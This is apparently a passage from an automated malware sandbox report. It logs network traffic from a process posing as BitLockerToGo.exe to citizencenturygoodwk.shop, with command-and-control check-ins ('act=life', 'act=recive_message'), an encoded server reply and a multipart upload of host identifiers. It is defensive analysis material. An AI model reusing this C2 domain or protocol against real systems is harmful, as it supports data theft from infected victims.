              Jul 5, 2024 06:03:15.454597950 CEST44349715188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:15.933123112 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:15.933162928 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:15.933255911 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:15.933679104 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:15.933691978 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.406003952 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.406095982 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.407357931 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.407368898 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.407614946 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.408914089 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.409020901 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.409060001 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.795792103 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.795896053 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.795959949 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.796284914 CEST49717443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.796303034 CEST44349717188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.942167044 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.942212105 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:16.942289114 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.942743063 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:16.942760944 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.416043997 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.416110992 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:17.417448997 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:17.417455912 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.417735100 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.419117928 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:17.419254065 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:17.419260025 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.797710896 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.797816038 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:17.797946930 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:17.798187017 CEST49720443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:17.798202038 CEST44349720188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.467570066 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.467607975 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.467700958 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.468292952 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.468303919 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.953274965 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.953368902 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.955065966 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.955080986 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.955323935 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.964915991 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.965862989 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.965884924 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966070890 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966114044 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966211081 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966274023 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966371059 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966392994 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966500998 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966531038 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966645956 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966662884 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966674089 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966691971 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.966794968 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.966831923 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977386951 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.977526903 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977557898 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.977581024 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977596045 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977617025 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:18.977663994 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977689981 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977714062 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:18.977749109 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:21.316454887 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:21.316566944 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:21.316679955 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:21.316797972 CEST49722443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:21.316812992 CEST44349722188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:21.325655937 CEST49723443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:21.325695038 CEST44349723188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:21.325813055 CEST49723443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:21.326219082 CEST49723443192.168.2.6188.114.96.3
              Jul 5, 2024 06:03:21.326236010 CEST44349723188.114.96.3192.168.2.6
              Jul 5, 2024 06:03:21.685795069 CEST49723443192.168.2.6188.114.96.3

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 5, 2024 06:03:09.701284885 CEST5171653192.168.2.61.1.1.1
              Jul 5, 2024 06:03:09.716104031 CEST53517161.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 5, 2024 06:03:09.701284885 CEST192.168.2.61.1.1.10x187cStandard query (0)citizencenturygoodwk.shopA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 5, 2024 06:03:09.716104031 CEST1.1.1.1192.168.2.60x187cNo error (0)citizencenturygoodwk.shop188.114.96.3A (IP address)IN (0x0001)false
              Jul 5, 2024 06:03:09.716104031 CEST1.1.1.1192.168.2.60x187cNo error (0)citizencenturygoodwk.shop188.114.97.3A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • citizencenturygoodwk.shop

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649711188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:10 UTC272OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 8
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
              Data Ascii: act=life
              2024-07-05 04:03:10 UTC808INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=kc38s57cvhottn5qhuvhogkf3o; expires=Mon, 28-Oct-2024 21:49:49 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJRSN7C9JDqBdpogjYwJpTjkqPpvOOmIM4PnkqV2oyg06NVD22AXrAA%2FkmWTgJu%2By3ym5RmBvMQCoScgGj5i65kZGr1dOJz9EnO5SgHh6cISFDL4%2FGFr9kvOr0aP33bfJs8QpXNmGmjOnhlO"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476b57d854216-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
              Data Ascii: 2ok
              2024-07-05 04:03:10 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649712188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:11 UTC273OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 51
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:11 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59 41 4c 55 56 26 6a 3d
              Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@SEFYALUV&j=
              2024-07-05 04:03:11 UTC814INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:11 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=8jgratetiibfvnug6a51r18op6; expires=Mon, 28-Oct-2024 21:49:50 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMVElCAdPX41RU2jzA1QQoj2z4SqG2%2BJfWkCj%2FeDvhLLWmjepNdFX%2Fap1HmcNafwxAVd4%2FlfxK%2BwSJ9fszm9M5tfHb12i0tOGE2ZrLA5psCED%2FHAJbbDeXmJGOTFya113ImwFHjJo47JlE3V"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476bb0e6c1a17-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-05 04:03:11 UTC555INData Raw: 31 36 34 61 0d 0a 6f 56 58 51 49 43 6d 38 44 4a 2f 2b 51 59 69 41 58 61 76 2f 74 4b 4a 78 41 32 30 57 37 69 56 35 2f 72 51 56 59 78 4f 4c 2f 66 4c 61 58 39 6b 43 58 35 34 32 76 38 70 74 67 6f 6c 2f 32 4a 71 57 6d 46 46 33 48 32 4f 4c 43 58 50 33 6c 6e 51 48 4d 62 48 64 6c 4d 41 35 6f 30 55 46 74 67 57 39 6d 7a 6d 71 75 6e 33 77 39 62 32 72 43 69 4e 50 63 34 41 48 51 39 36 57 63 41 6c 78 36 70 47 51 77 44 36 2f 55 45 58 66 5a 50 4f 5a 4b 65 33 6a 4f 63 71 54 32 63 63 55 5a 67 78 38 67 45 77 55 6c 74 6b 33 54 7a 4f 70 6d 49 69 44 62 2f 41 43 5a 4e 6c 34 2f 72 4d 67 2b 2b 74 2f 69 34 4b 59 71 48 67 4b 46 6a 62 4d 51 42 66 63 6a 6a 56 42 63 75 36 66 6e 73 63 78 75 30 68 42 31 47 6a 38 6d 69 76 34 36 54 76 44 6c 39 62 47 47 47 77 48 5a 6f 4a 44 45 35 44 58 65
              Data Ascii: 164aoVXQICm8DJ/+QYiAXav/tKJxA20W7iV5/rQVYxOL/fLaX9kCX542v8ptgol/2JqWmFF3H2OLCXP3lnQHMbHdlMA5o0UFtgW9mzmqun3w9b2rCiNPc4AHQ96WcAlx6pGQwD6/UEXfZPOZKe3jOcqT2ccUZgx8gEwUltk3TzOpmIiDb/ACZNl4/rMg++t/i4KYqHgKFjbMQBfcjjVBcu6fnscxu0hB1Gj8miv46TvDl9bGGGwHZoJDE5DXe
              2024-07-05 04:03:11 UTC1369INData Raw: 7a 48 75 6b 39 43 62 64 66 4a 47 53 74 70 76 2b 5a 49 74 37 75 34 35 78 35 44 5a 78 68 6c 68 43 48 36 45 54 78 71 52 33 58 67 42 64 4f 53 62 6c 73 38 32 74 77 49 46 6e 43 37 36 68 47 4f 79 6f 48 2f 6e 6d 74 58 53 55 56 51 4d 65 6f 4a 41 44 64 79 55 61 45 38 5a 67 76 53 4a 67 58 65 31 54 67 75 47 4c 4c 32 53 4a 75 58 77 50 74 75 59 32 4e 49 66 5a 41 6c 35 6a 30 6b 62 6d 64 46 36 44 33 66 75 6e 4a 6a 48 4e 72 78 4f 51 64 31 71 2f 74 78 74 71 4b 49 34 30 64 32 4f 67 6c 4e 51 44 48 43 4c 56 52 69 53 6c 6a 55 65 50 34 48 30 2b 39 70 31 38 6b 56 48 6e 6a 61 2f 33 43 6e 73 37 7a 62 43 6d 74 37 4d 41 57 6f 41 64 34 56 41 48 5a 62 56 66 77 74 33 35 35 36 58 78 6a 43 67 54 45 44 54 62 66 65 61 59 36 53 67 66 38 36 46 6c 70 68 52 49 53 46 33 6e 56 45 70 6e 38 64 6d
              Data Ascii: zHuk9CbdfJGStpv+ZIt7u45x5DZxhlhCH6ETxqR3XgBdOSbls82twIFnC76hGOyoH/nmtXSUVQMeoJADdyUaE8ZgvSJgXe1TguGLL2SJuXwPtuY2NIfZAl5j0kbmdF6D3funJjHNrxOQd1q/txtqKI40d2OglNQDHCLVRiSljUeP4H0+9p18kVHnja/3Cns7zbCmt7MAWoAd4VAHZbVfwt3556XxjCgTEDTbfeaY6Sgf86FlphRISF3nVEpn8dm
              2024-07-05 04:03:11 UTC1369INData Raw: 4f 64 7a 48 57 48 51 55 58 51 61 65 76 63 59 66 57 73 56 36 4c 32 7a 34 4a 54 5a 67 4d 30 31 41 56 62 6b 4e 39 33 43 6e 76 74 6e 35 66 4f 4d 72 46 46 53 4e 4e 70 39 35 49 6b 37 75 34 32 78 4a 76 57 78 78 64 6b 48 58 47 46 53 78 66 63 6d 44 56 42 64 76 48 66 79 49 46 33 6e 55 56 64 33 55 48 2b 6a 53 71 71 6f 43 43 48 39 62 32 72 43 69 4e 50 63 34 41 48 51 39 36 57 63 41 52 35 34 70 6d 59 77 79 57 33 54 45 44 66 5a 50 75 64 4c 75 62 6b 50 38 69 64 30 4d 77 54 5a 67 68 6d 6e 6b 49 64 6a 74 77 33 54 7a 4f 70 6d 49 69 44 62 2f 41 43 66 63 35 35 37 49 70 68 33 2b 45 78 78 35 72 41 67 46 46 2b 51 52 7a 6e 4c 41 4c 65 6c 6e 41 4e 4d 62 48 64 30 4d 67 33 76 6b 56 44 32 47 72 31 6b 79 7a 6a 38 44 37 46 6b 38 54 48 45 32 67 42 65 34 42 4f 46 70 76 62 66 41 74 38 37
              Data Ascii: OdzHWHQUXQaevcYfWsV6L2z4JTZgM01AVbkN93Cnvtn5fOMrFFSNNp95Ik7u42xJvWxxdkHXGFSxfcmDVBdvHfyIF3nUVd3UH+jSqqoCCH9b2rCiNPc4AHQ96WcAR54pmYwyW3TEDfZPudLubkP8id0MwTZghmnkIdjtw3TzOpmIiDb/ACfc557Iph3+Exx5rAgFF+QRznLALelnANMbHd0Mg3vkVD2Gr1kyzj8D7Fk8THE2gBe4BOFpvbfAt87
              2024-07-05 04:03:11 UTC1369INData Raw: 2b 6f 45 78 46 31 32 50 37 6c 43 54 6b 37 7a 54 50 6c 74 48 48 46 57 77 48 65 59 6c 45 47 70 6a 63 5a 51 4a 36 34 35 4b 61 67 33 6e 77 41 6b 7a 47 4c 71 58 65 59 38 33 75 46 74 6d 47 78 4e 5a 54 49 78 41 36 35 43 78 77 68 5a 51 33 42 6e 32 70 78 39 4b 44 4e 4c 31 4c 52 4e 5a 6d 38 70 4d 6e 35 4f 51 35 78 4a 6a 5a 79 67 46 70 41 58 6d 48 53 42 43 4f 31 6e 6f 46 66 65 32 58 6d 38 6c 33 2f 41 41 4c 32 58 61 39 78 47 47 71 31 7a 4c 47 6e 64 58 57 55 79 4d 51 4f 75 51 73 63 49 57 55 4e 77 5a 39 71 63 66 53 67 7a 75 38 51 6b 54 53 59 76 61 55 49 75 62 73 4f 4d 79 55 33 73 67 42 59 41 74 38 6a 55 6b 55 6e 64 4a 79 42 48 58 75 6d 35 62 4d 64 2f 77 41 43 39 6c 32 76 63 52 68 71 73 30 59 2f 4e 2f 33 2b 6c 4d 6a 45 44 72 6b 4c 48 43 46 6c 44 63 47 66 61 6e 48 30 6f
              Data Ascii: +oExF12P7lCTk7zTPltHHFWwHeYlEGpjcZQJ645Kag3nwAkzGLqXeY83uFtmGxNZTIxA65CxwhZQ3Bn2px9KDNL1LRNZm8pMn5OQ5xJjZygFpAXmHSBCO1noFfe2Xm8l3/AAL2Xa9xGGq1zLGndXWUyMQOuQscIWUNwZ9qcfSgzu8QkTSYvaUIubsOMyU3sgBYAt8jUkUndJyBHXum5bMd/wAC9l2vcRhqs0Y/N/3+lMjEDrkLHCFlDcGfanH0o
              2024-07-05 04:03:11 UTC1052INData Raw: 53 39 39 74 2b 5a 63 6b 37 4f 51 2b 79 70 6a 56 78 52 56 67 44 33 69 47 51 42 4f 57 32 48 6f 48 64 65 2b 5a 30 49 31 31 38 6b 56 54 6e 6a 61 2f 33 42 48 6e 37 44 62 4b 6d 39 76 57 4f 31 42 50 4e 70 4d 4a 63 2f 65 39 62 6b 4d 78 37 70 50 51 6d 33 58 79 52 6b 44 57 59 76 69 55 4a 75 76 71 4e 63 47 53 32 64 49 53 62 67 5a 7a 68 30 6f 55 6b 74 4e 35 45 33 62 69 6c 4a 6a 4b 4f 62 51 43 42 5a 77 75 2b 6f 52 6a 73 71 42 2f 2f 35 37 59 79 77 4a 75 44 48 6a 4d 42 51 54 53 76 68 78 71 61 4b 76 66 6c 38 39 33 36 67 41 4c 31 47 58 35 6e 79 66 76 37 54 37 49 6d 38 54 48 47 6e 4d 42 65 59 4e 50 45 35 58 58 63 77 52 38 37 35 4f 61 77 6a 43 38 54 45 4f 65 49 4c 2f 63 4a 50 4b 69 5a 34 76 64 39 39 41 49 63 78 6c 35 72 55 6f 55 33 4a 52 6f 54 78 6d 43 39 49 6d 42 64 37 56
              Data Ascii: S99t+Zck7OQ+ypjVxRVgD3iGQBOW2HoHde+Z0I118kVTnja/3BHn7DbKm9vWO1BPNpMJc/e9bkMx7pPQm3XyRkDWYviUJuvqNcGS2dISbgZzh0oUktN5E3bilJjKObQCBZwu+oRjsqB//57YywJuDHjMBQTSvhxqaKvfl8936gAL1GX5nyfv7T7Im8THGnMBeYNPE5XXcwR875OawjC8TEOeIL/cJPKiZ4vd99AIcxl5rUoU3JRoTxmC9ImBd7V
              2024-07-05 04:03:11 UTC1369INData Raw: 33 61 39 36 0d 0a 65 57 78 48 67 4e 65 65 32 62 6b 63 34 7a 75 6b 39 48 33 6d 72 39 6d 53 44 6e 34 33 2b 48 33 35 62 48 43 79 46 58 4e 73 78 78 48 4a 50 45 65 51 59 78 71 34 44 65 71 31 7a 5a 57 77 6d 65 61 66 48 63 65 36 69 69 4d 4d 57 5a 33 63 51 55 5a 51 5a 33 68 45 49 57 6d 4e 39 32 43 58 6a 75 6b 4a 76 46 50 4c 46 46 53 74 4e 76 38 5a 55 72 37 65 68 2f 68 39 2b 57 78 77 73 68 56 7a 62 4d 63 52 79 45 39 6e 6f 62 4d 61 75 41 33 71 74 63 32 56 73 4a 6e 6d 6e 78 33 48 75 6f 6f 6a 48 45 6d 39 66 42 47 32 6b 50 63 6f 5a 44 47 4a 58 56 63 41 68 33 34 70 79 61 7a 44 43 30 52 6b 76 56 61 66 4f 61 4a 75 48 72 66 34 66 66 6c 73 63 4c 49 56 63 32 7a 47 45 34 6a 73 52 46 44 33 4c 79 33 39 4c 63 65 64 6f 70 49 4d 63 73 76 5a 73 76 71 72 70 39 69 5a 62 65 7a 77 46
              Data Ascii: 3a96eWxHgNee2bkc4zuk9H3mr9mSDn43+H35bHCyFXNsxxHJPEeQYxq4Deq1zZWwmeafHce6iiMMWZ3cQUZQZ3hEIWmN92CXjukJvFPLFFStNv8ZUr7eh/h9+WxwshVzbMcRyE9nobMauA3qtc2VsJnmnx3HuoojHEm9fBG2kPcoZDGJXVcAh34pyazDC0RkvVafOaJuHrf4fflscLIVc2zGE4jsRFD3Ly39LcedopIMcsvZsvqrp9iZbezwF
              2024-07-05 04:03:11 UTC1369INData Raw: 67 63 30 6e 39 4e 38 41 44 50 4f 6d 5a 66 50 64 2f 42 64 42 62 59 46 6c 6f 56 68 71 75 55 7a 69 63 57 55 67 42 42 6c 41 58 32 44 51 78 47 62 31 6e 41 48 63 65 47 55 6e 63 67 6c 74 30 78 4f 33 32 37 38 6b 79 2f 71 38 44 72 48 6c 74 76 45 55 79 39 4e 4e 49 74 66 57 38 53 55 4e 79 46 79 36 4a 61 43 77 44 61 37 41 67 6e 42 49 4a 58 33 53 50 4f 67 66 38 36 52 6c 70 68 52 49 51 70 33 69 30 45 55 6c 4e 42 7a 44 6e 37 71 6c 5a 72 44 50 37 56 47 53 74 35 72 2f 70 45 74 34 4f 67 38 78 5a 50 56 7a 52 31 68 54 7a 72 4f 42 78 79 45 6c 69 39 44 4d 63 71 49 68 73 6b 73 38 67 42 55 6b 41 61 57 39 7a 71 6f 6f 6a 6a 46 33 59 36 43 55 32 77 49 65 6f 52 42 46 5a 72 45 65 77 35 33 36 5a 36 61 7a 6a 75 35 52 55 58 56 61 50 69 52 49 2b 7a 6b 4f 38 32 5a 32 4d 4e 54 4c 30 30 30
              Data Ascii: gc0n9N8ADPOmZfPd/BdBbYFloVhquUzicWUgBBlAX2DQxGb1nAHceGUncglt0xO3278ky/q8DrHltvEUy9NNItfW8SUNyFy6JaCwDa7AgnBIJX3SPOgf86RlphRIQp3i0EUlNBzDn7qlZrDP7VGSt5r/pEt4Og8xZPVzR1hTzrOBxyEli9DMcqIhsks8gBUkAaW9zqoojjF3Y6CU2wIeoRBFZrEew536Z6azju5RUXVaPiRI+zkO82Z2MNTL000
              2024-07-05 04:03:11 UTC1369INData Raw: 79 45 48 32 6f 61 39 74 48 34 71 46 79 72 4b 69 43 31 42 62 32 4b 59 37 4b 67 62 59 66 31 76 61 74 34 49 52 30 30 31 41 56 62 32 39 56 6c 45 33 66 71 69 5a 4f 45 43 59 78 42 58 64 4e 68 39 70 30 64 31 4d 77 79 79 4a 37 59 67 69 4a 33 41 6d 53 50 51 68 79 69 36 48 6b 47 5a 65 36 52 6c 73 4e 33 2f 43 6f 67 74 51 57 39 6b 32 4f 79 6f 41 61 4a 31 5a 62 2f 58 51 6c 6b 48 2b 63 48 41 39 79 4f 4e 55 46 45 36 70 47 65 78 43 47 6a 44 32 6a 49 59 2f 4b 58 49 71 71 73 56 36 4c 32 76 59 41 56 49 56 63 32 33 41 6c 7a 39 37 30 63 51 58 58 34 33 38 69 42 5a 2b 41 5a 48 6f 30 35 72 63 35 4c 67 59 6b 67 68 2f 57 39 71 77 6f 4a 5a 42 2f 6e 42 77 33 63 6a 6a 56 54 50 34 48 30 2b 36 68 33 6f 41 49 54 6e 43 36 36 6b 69 37 72 34 54 48 4b 6a 38 54 47 45 48 63 4d 4d 37 4a 35 4f
              Data Ascii: yEH2oa9tH4qFyrKiC1Bb2KY7KgbYf1vat4IR001AVb29VlE3fqiZOECYxBXdNh9p0d1MwyyJ7YgiJ3AmSPQhyi6HkGZe6RlsN3/CogtQW9k2OyoAaJ1Zb/XQlkH+cHA9yONUFE6pGexCGjD2jIY/KXIqqsV6L2vYAVIVc23Alz970cQXX438iBZ+AZHo05rc5LgYkgh/W9qwoJZB/nBw3cjjVTP4H0+6h3oAITnC66ki7r4THKj8TGEHcMM7J5O
              2024-07-05 04:03:11 UTC1369INData Raw: 52 5a 75 62 66 33 71 74 63 32 53 6b 4c 32 43 36 6c 33 6e 47 6b 69 6c 53 69 39 70 62 45 41 69 46 58 4e 74 77 56 51 4d 6d 46 49 46 45 6a 67 66 54 37 33 48 6e 61 4b 53 44 48 42 70 62 33 53 4b 72 30 66 35 48 66 68 49 35 37 43 6d 51 66 7a 46 56 62 78 4a 51 33 52 6e 4c 37 6a 5a 62 41 49 62 45 46 64 65 42 4a 38 35 73 69 2f 50 49 6f 78 74 4c 34 39 6a 4a 66 4d 57 47 50 53 52 57 62 77 47 5a 42 50 34 48 30 2b 36 68 33 76 51 49 54 6e 46 65 39 31 47 50 56 72 46 65 69 39 72 32 41 43 79 46 58 4e 73 78 79 47 4a 4c 59 63 42 64 67 70 4c 69 65 78 44 61 6b 55 6c 7a 52 49 64 4f 71 41 71 71 73 56 36 4c 32 76 59 41 56 49 56 63 32 33 67 6c 7a 39 37 30 63 51 58 58 34 33 38 69 42 5a 2b 41 5a 48 6f 30 35 72 63 35 4c 67 59 6b 67 68 2f 57 39 71 77 6f 4a 5a 42 2f 6e 42 77 33 63 6a 6a
              Data Ascii: RZubf3qtc2SkL2C6l3nGkilSi9pbEAiFXNtwVQMmFIFEjgfT73HnaKSDHBpb3SKr0f5HfhI57CmQfzFVbxJQ3RnL7jZbAIbEFdeBJ85si/PIoxtL49jJfMWGPSRWbwGZBP4H0+6h3vQITnFe91GPVrFei9r2ACyFXNsxyGJLYcBdgpLiexDakUlzRIdOqAqqsV6L2vYAVIVc23glz970cQXX438iBZ+AZHo05rc5LgYkgh/W9qwoJZB/nBw3cjj


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.649713188.114.96.34433800C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              TimestampBytes transferredDirectionData
              2024-07-05 04:03:12 UTC291OUTPOST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 12863
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:12 UTC12863OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:12 UTC814INHTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:12 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=9irulufli53qst9lks2pbf8gjl; expires=Mon, 28-Oct-2024 21:49:51 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
